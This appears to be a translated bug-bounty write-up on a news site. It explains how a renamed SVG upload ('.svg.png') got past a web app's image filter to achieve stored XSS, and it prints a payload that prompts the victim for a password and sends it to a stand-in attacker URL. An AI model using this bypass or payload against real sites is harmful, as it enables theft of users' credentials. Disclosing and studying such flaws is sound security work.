Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to use the picture upload function to achieve storage XSS. Many people may not know much about it. In order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

Loophole discovery

1. Log in to the target WEB application

2. Manual enumeration test

3. Observe the WEB application style:

4, you can see a number of text input areas, I tried vulnerabilities such as sqli, xss, ssti, and so on, no problem. But then the upload points of Logo, Background Image and Advertisement Image images caught my attention, so I decided to construct some special files to upload and see how I would react. I immediately constructed a file in svg format and uploaded it:

5. However, the server returned the following error response after upload:

6. Is it possible to bypass the format restrictions? So I tampered with the file name, changed "Fileupload.svg" to "Fileupload.svg.png" and uploaded it, and it was a success:

7. After that, I click "Next" in the previous interface and jump to another page, where I can access the pictures I just uploaded, and these pictures are all thumbnails:

8. After clicking "View Image" on the right button above, the expected svg xss pops up:

The svg file I constructed is as follows, which contains XSS Payload:

Alert ([xss_clean])

To modify it, you can add the account password to steal Payload. The final result is as follows:

Var passwd = prompt ("Enter your password to continue"); var xhr = new XMLHttpRequest (); xhr.open ("GET", "https://attacker-url.com/log.php?password="+encodeURI(passwd)); xhr.send ())

9. Upload these SVG files again:

10. Right-click "View Image" to access the above svg file:

11. Jump out of the XSS Payload prompt box for password input, and click to enter the password, and you can see that the password has been stolen:

Loophole reward

The vulnerability eventually received a reward of $1000.

After reading the above, do you have any further understanding of how to use the image upload function to achieve storage XSS? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.